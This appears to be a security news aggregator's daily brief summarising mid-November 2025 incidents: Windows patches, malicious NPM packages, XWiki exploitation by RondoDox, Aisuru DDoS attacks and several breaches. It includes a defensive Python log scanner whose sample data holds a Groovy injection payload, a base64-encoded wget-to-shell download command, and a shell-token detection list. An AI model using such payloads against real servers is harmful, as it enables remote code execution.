Daily Brief

Articles are listed below, each followed by a generated summary

Total articles found: 12645

Checks for new stories every ~15 minutes

2025-11-18 00:26:39 bleepingcomputer VULNERABILITIES Microsoft Releases Emergency Update to Fix Windows 10 ESU Errors
Microsoft issued an out-of-band update, KB5072653, to address installation errors with Windows 10's November extended security updates, affecting both consumer and enterprise devices. Windows 10 reached end of support in October 2025, so continued security patches now require enrollment in the Extended Security Updates (ESU) program, available for a fee or, for consumers, through Microsoft Rewards points. The update resolves the 0x800f0922 errors that prevented November's security patches from installing. Affected devices must be running Windows 10 version 22H2 with the October 2025 cumulative update before the fix, delivered automatically via Windows Update, will install. Enterprise environments using WSUS and SCCM also saw failures in update compliance checks; Microsoft plans to release a new Scan Cab to address them. The episode shows that end-of-life software covered by ESU still needs active patch management: administrators should confirm the October 2025 prerequisite is present on each device and that compliance reporting reflects the November package.
2025-11-17 23:50:30 bleepingcomputer MALWARE Malicious NPM Packages Exploit Adspect for Cryptocurrency Scams
Seven NPM packages published under the name "dino_reborn" between September and November use the Adspect traffic-cloaking service to redirect victims to cryptocurrency scam sites. Six of the packages contain malicious code that fingerprints visitors to distinguish potential victims from researchers and automated scanners. The cloaking logic is a 39kB script that executes automatically on page load and blocks common browser inspection actions to hinder analysis of the JavaScript. Visitors classified as targets are redirected to fake cryptocurrency CAPTCHA pages, while researchers are shown benign content, keeping suspicion and detection low. Adspect is a commercial cloaking service sold for filtering bots, moderators and other unwanted traffic away from ad campaigns; here it is repurposed to hide the scam from security tooling. The incident underscores the need to monitor third-party packages for runtime behaviour, not just static content, and to treat the presence of cloaking services in a dependency as a red flag.
2025-11-17 22:44:12 bleepingcomputer MALWARE RondoDox Botnet Exploits Critical XWiki Vulnerability for Attacks
The RondoDox botnet is exploiting a critical remote code execution flaw in XWiki Platform, tracked as CVE-2025-24893, against internet-exposed servers. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) lists the flaw as actively exploited, prompting urgent attention from security teams. VulnCheck reports multiple threat actors, including botnet operators and cryptocurrency miners, leveraging the vulnerability. RondoDox spreads via a crafted HTTP GET request that injects base64-encoded Groovy code, which downloads and executes a remote shell payload. The botnet now carries exploits for 56 known vulnerabilities, and recent intrusions have also deployed cryptocurrency miners. XWiki Platform users are advised to upgrade to version 15.10.11 or 16.4.1 to close the hole. Publicly available indicators of compromise (IoCs) can be used to block RondoDox exploitation attempts.
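The crafted-request pattern described above lends itself to a simple access-log check. The following Python is an added example and is not code from the article, from VulnCheck or from the XWiki project: it scans constructed Apache-style log lines for GET requests whose query string carries XWiki Groovy macro markup or a base64 token that decodes to a shell command. The endpoint path (/xwiki/bin/get/Main/SolrSearch), the `text` parameter and the sample payloads are assumptions for illustration only; check the vendor advisory and the published IoCs for the exact vulnerable endpoint on your deployment.

```python
import base64
import binascii
import re
from urllib.parse import quote, unquote, urlsplit

# Constructed sample access-log lines (not real traffic). Two requests carry
# payload indicators, two are ordinary wiki traffic. The SolrSearch endpoint
# and the `text` parameter are assumptions for illustration only.
_MACRO = quote('}}}{{groovy}}println("x"){{/groovy}}', safe="")
_B64 = quote(base64.b64encode(b"wget http://198.51.100.5/x.sh -O- | sh").decode(), safe="")
SAMPLE_LOG = f"""\
203.0.113.10 - - [17/Nov/2025:10:01:02 +0000] "GET /xwiki/bin/view/Main/ HTTP/1.1" 200 5120
203.0.113.11 - - [17/Nov/2025:10:01:09 +0000] "GET /xwiki/bin/get/Main/SolrSearch?text={_MACRO} HTTP/1.1" 200 88
203.0.113.12 - - [17/Nov/2025:10:02:15 +0000] "GET /xwiki/bin/get/Main/SolrSearch?text={_B64} HTTP/1.1" 200 64
203.0.113.13 - - [17/Nov/2025:10:03:40 +0000] "GET /xwiki/bin/get/Main/SolrSearch?text=installation%20guide HTTP/1.1" 200 2048
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)
GROOVY_MARKUP = re.compile(r"\{\{\s*groovy\b", re.IGNORECASE)
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
# Substrings that, when found in a decoded token, indicate a dropper command.
SHELL_TOKENS = ("groovy", "/bin/sh", "sh -c", "wget ", "curl ", "chmod ")


def decode_b64_tokens(text):
    """Return the UTF-8 strings hidden in any base64-looking runs of `text`."""
    found = []
    for m in B64_TOKEN.finditer(text):
        core = m.group(0).rstrip("=")
        padded = core + "=" * (-len(core) % 4)  # restore padding stripped by the URL
        try:
            found.append(base64.b64decode(padded, validate=True).decode("utf-8"))
        except (binascii.Error, ValueError, UnicodeDecodeError):
            continue  # not base64, or not text: ignore
    return found


def analyze_request(target):
    """Classify one request target; returns the list of indicators hit."""
    parts = urlsplit(target)
    path = unquote(parts.path)
    query = unquote(parts.query)
    reasons = []
    if path.lower().endswith("/bin/get/main/solrsearch"):  # assumed endpoint
        reasons.append("solrsearch-endpoint")
    if GROOVY_MARKUP.search(query):
        reasons.append("groovy-macro")
    for decoded in decode_b64_tokens(query):
        low = decoded.lower()
        if any(tok in low for tok in SHELL_TOKENS):
            reasons.append("b64-payload:" + decoded[:40])
            break
    return reasons


def scan_log(text):
    """Return (ip, target, reasons) for lines carrying a payload indicator.

    Hitting the search endpoint alone is legitimate traffic, so a line is
    reported only when a Groovy macro or a decoded shell command is present.
    """
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        reasons = analyze_request(m["target"])
        if any(r != "solrsearch-endpoint" for r in reasons):
            hits.append((m["ip"], m["target"], reasons))
    return hits


if __name__ == "__main__":
    for ip, target, reasons in scan_log(SAMPLE_LOG):
        print(ip, reasons, target[:60])
```

Run against real logs by replacing SAMPLE_LOG with the file contents; the decoder deliberately ignores base64 runs that are not valid UTF-8 text, so binary blobs in legitimate parameters do not produce noise, and a hit on the search endpoint alone is never reported.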
2025-11-17 22:00:53 theregister DDOS Azure Mitigates Record-Breaking 15.72 Tbps DDoS Attack by Aisuru Botnet
Microsoft Azure absorbed the largest DDoS attack yet recorded against a cloud provider, peaking at 15.72 terabits per second and originating from the Aisuru botnet. The attack targeted a single endpoint in Australia from more than 500,000 source IPs, reaching 3.64 billion packets per second. Azure's DDoS protection service detected and mitigated the flood without customer-facing service interruption. Aisuru, a Mirai-based IoT botnet, has been escalating its capabilities; it hit KrebsOnSecurity with a 6.3 Tbps attack in May 2025. The botnet mainly compromises home routers and cameras and operates as a DDoS-for-hire service, reportedly steering clear of national-security targets. Separately, Cloudflare removed Aisuru-linked domains from its public top-domain rankings after bot-generated DNS query volume pushed them into the list, to keep the rankings from being manipulated. The incident underscores the growing scale of DDoS attacks; Cloudflare reported a 40% year-over-year rise in such activity in Q2 2025.
2025-11-17 21:34:49 theregister DATA BREACH GAO Report Exposes DoD Vulnerabilities via Social Media Leaks
The Government Accountability Office (GAO) identified significant lapses in the Department of Defense's (DoD) training and guidance on preventing sensitive information leaks through social media channels. Auditors acting as threat actors discovered exploitable data from military personnel and their families online, posing risks to operational security and personal safety. Public social media posts and official press releases were found to inadvertently disclose sensitive details, potentially endangering military operations and personnel. The GAO's investigation revealed that 10 DoD components lacked comprehensive training and threat assessment protocols, particularly in areas beyond traditional operational security. The GAO issued 12 recommendations to the DoD, which agreed to implement all but one, citing limitations in controlling personal digital activities of personnel and their families. The report underscores the need for improved digital awareness and training to mitigate risks posed by the digital footprints of service members and their families. The DoD's partial acceptance of recommendations highlights ongoing challenges in balancing operational security with personal freedoms in the digital age.
2025-11-17 21:17:16 bleepingcomputer DATA BREACH Eurofiber France Data Breach Exposes Sensitive Customer Information
Eurofiber France reported a data breach affecting its ticket management system, where hackers exploited a vulnerability to access and exfiltrate sensitive information. The breach impacts the French division of Eurofiber Group, including its cloud division and regional sub-brands, but does not affect critical data or the broader Eurofiber network. The company quickly enhanced security measures, patched the vulnerability, and implemented additional protections to prevent further data leaks. A threat actor, 'ByteToBreach', claims to have stolen data from 10,000 businesses and government entities, including VPN configurations and SQL backup files. Eurofiber France has notified relevant authorities, including CNIL and ANSSI, and filed a report for extortion as the threat actor demands payment to avoid data exposure. The incident follows previous breaches in the French telecommunications sector, indicating a persistent threat landscape for service providers. Eurofiber France is in the process of notifying affected customers, though specific details on the types of data stolen remain undisclosed.
2025-11-17 19:53:25 theregister DATA BREACH Coinbase Faces Scrutiny Over Delayed Disclosure of Data Breach
Security researcher Jonathan Clark claims Coinbase was aware of a December 2024 breach months before its official disclosure in May 2025. Clark reported the breach to Coinbase on January 7, 2025, after scammers attempted to defraud him using detailed personal information. The breach involved unauthorized access to nearly 70,000 customers' private and financial data, including Social Security numbers and transaction history. Despite an initial acknowledgment from Coinbase's Head of Trust and Safety, Clark received no further communication after multiple follow-ups. Coinbase disclosed the breach to the SEC in May, stating the attack occurred on December 26, 2024, and was discovered on May 11, 2025. The attackers also attempted to extort Coinbase for $20 million, raising concerns about the company's incident response and communication practices. This incident underscores the critical importance of timely breach disclosures and robust communication with affected parties to maintain trust.
2025-11-17 19:45:40 bleepingcomputer DATA BREACH Princeton University Data Breach Exposes Alumni and Donor Information
Princeton University experienced a data breach on November 10, impacting alumni, donors, faculty, and students' personal information stored in a fundraising database. Threat actors accessed the database through a phishing attack targeting a university employee, compromising names, emails, and addresses. The compromised database did not include sensitive financial information, Social Security numbers, or detailed student records protected by privacy laws. University officials have blocked the attackers' access and confirmed no further systems were compromised. Affected individuals are advised to verify any communication from the university before sharing sensitive information to avoid potential phishing scams. The incident follows a similar breach at the University of Pennsylvania, though Princeton reports no evidence linking the two events. The breach underscores the importance of robust phishing defenses and employee awareness training to protect sensitive institutional data.
2025-11-17 19:21:47 bleepingcomputer CYBERCRIME Dutch Police Disrupt Major Bulletproof Hosting Service Operation
Dutch authorities seized 250 servers from a bulletproof hosting service, used by cybercriminals for anonymity since 2022, impacting over 80 cybercrime investigations globally. The hosting service facilitated ransomware, botnet, phishing activities, and child abuse content distribution, exploiting its no-KYC and no-logs policies. The operation, part of "Operation Endgame," also targeted malware like Rhadamanthys, VenomRAT, and Elysium, with no arrests announced yet. Thousands of virtual servers were taken offline, disrupting services for clients who relied on the provider for anonymous operations. Investigators are conducting forensic analyses on the seized servers to identify operators and clientele involved in illicit activities. The service, speculated to be CrazyRDP, is now offline, causing concerns among users about potential exit scams and unresolved technical issues. This action underscores the ongoing efforts to dismantle infrastructure supporting cybercriminal activities and enhance global cybersecurity.
2025-11-17 17:29:28 theregister CYBERCRIME U.S. Citizens Plead Guilty in North Korean Identity Fraud Scheme
Four U.S. citizens and a Ukrainian broker admitted to aiding North Korean IT workers in securing fraudulent employment with American companies. The scheme involved selling identities, leading to unauthorized access to jobs and salaries at over 64 U.S. companies. Participants facilitated remote work setups, allowing North Korean operatives to appear as U.S.-based employees, resulting in $1.28 million in salary fraud. A former U.S. Army soldier was among those involved, earning over $51,000, while others earned significantly less. The Department of Justice emphasized the national security implications, as the fraud supports North Korea's financial and intelligence objectives. The FBI urges companies to enhance vetting processes for remote workers to prevent similar fraudulent activities. Okta and CrowdStrike have identified a growing trend of North Korean-linked scams targeting U.S. businesses for financial gain and intellectual property theft.
2025-11-17 17:14:09 bleepingcomputer DDOS Azure Network Withstands Massive 15 Tbps DDoS Assault by Aisuru Botnet
Microsoft Azure faced a DDoS attack peaking at 15.72 terabits per second from the Aisuru botnet, sourced from more than 500,000 IP addresses. The attack targeted a single public IP in Australia with high-rate UDP floods that reached nearly 3.64 billion packets per second. Aisuru is a Turbo Mirai-class IoT botnet that compromises home routers and cameras, mostly on residential ISPs worldwide. Cloudflare has linked Aisuru to an earlier record-breaking 22.2 Tbps attack, demonstrating its capacity for large-scale disruption. The botnet grew sharply in April 2025 after its operators compromised a TotoLink router firmware server and infected roughly 100,000 additional devices. Cloudflare has also removed Aisuru-related domains from its public domain rankings, where bot-driven DNS lookups had pushed them, to prevent manipulation of the list. The incident underscores the growing threat of IoT-based botnets and the need for volumetric DDoS defences that scale with them.
2025-11-17 16:54:09 thehackernews MALWARE EVALUSION Campaign Deploys Amatera Stealer and NetSupport RAT
eSentire has identified the EVALUSION campaign, leveraging ClickFix tactics to distribute Amatera Stealer and NetSupport RAT, posing significant risks to data security. Amatera Stealer, an evolution of the ACR Stealer, is available via subscription and targets crypto-wallets, browsers, and messaging applications, among others. The malware employs advanced evasion techniques, including WoW64 SysCalls, to bypass common security measures like sandboxes and anti-virus solutions. Attackers trick users into executing malicious commands through phishing pages, initiating a process that downloads and executes the malware via PowerShell scripts. The payload, Amatera Stealer DLL, is packed using PureCrypter and injected into the MSBuild.exe process to harvest sensitive data. NetSupport RAT is only downloaded if the victim's machine is part of a domain or contains files of potential value, such as crypto wallets. The campaign is part of a broader trend of phishing attacks using sophisticated obfuscation techniques to evade detection by security tools.
2025-11-17 16:36:22 bleepingcomputer VULNERABILITIES DoorDash Email Spoofing Flaw Sparks Disclosure Dispute with Researcher
A vulnerability in DoorDash's systems allowed unauthorized sending of branded emails, creating a potential phishing channel until recently patched by the company. The flaw was discovered by a security researcher, who reported it could be exploited for social engineering scams using DoorDash's official email templates. The vulnerability involved manipulating the DoorDash for Business platform to send emails with crafted HTML, bypassing spam filters and appearing legitimate. A dispute arose between the researcher and DoorDash over the handling of the disclosure, with accusations of unethical behavior from both parties. Despite the flaw being patched, the researcher claims it remained exploitable for over 15 months, criticizing DoorDash's delayed response. DoorDash asserts the issue was out of scope for their bug bounty program and accuses the researcher of attempting extortion. The incident highlights the challenges in vulnerability disclosure processes and the need for clear communication and ethical standards between researchers and companies.
2025-11-17 15:59:44 bleepingcomputer DATA BREACH Pennsylvania Attorney General Confirms Ransomware-Induced Data Breach
The Pennsylvania Attorney General's Office confirmed a data breach following an August 2025 ransomware attack by the INC Ransom group, affecting personal and medical information. The attack led to significant operational disruptions, taking down the office's website, email accounts, and phone lines, causing widespread impact. Personal data compromised includes names, Social Security numbers, and medical information, as per the Office's investigation. The breach exploited vulnerabilities in Citrix NetScaler appliances, specifically CVE-2025-5777, known as Citrix Bleed 2, affecting public-facing systems. INC Ransom claimed responsibility on their dark web site, alleging theft of 5.7TB of data and potential access to an FBI network. The Pennsylvania OAG chose not to pay the ransom, following a precedent set by previous breaches within the state. This incident marks the third ransomware attack on Pennsylvania state entities, highlighting ongoing cybersecurity challenges.
2025-11-17 15:39:38 theregister CYBERCRIME Europol Targets Extremist Content on Gaming Platforms in Major Sweep
Europol's Internet Referral Unit conducted a large-scale operation on November 13, targeting extremist content across gaming and related platforms. The operation identified thousands of URLs, including 5,408 links to jihadist content and 1,070 promoting violent right-wing extremism. This initiative marks Europol's first significant action focusing on gaming platforms, which are increasingly exploited for radicalization and extremist recruitment. Extremists use gaming spaces for strategic dissemination of propaganda, employing tactics like re-enacting violent scenes in games to attract young audiences. Europol's action forms part of a coordinated "Referral Action Day," involving multiple countries to combat the misuse of digital platforms. The IRU's efforts align with the EU's Radicalisation Awareness Network, which warns of the strategic use of gaming spaces by extremist groups. Gaming platform operators may face increased pressure to collaborate with law enforcement and swiftly address extremist content. This development serves as a caution to parents and young gamers about the evolving risks within gaming environments.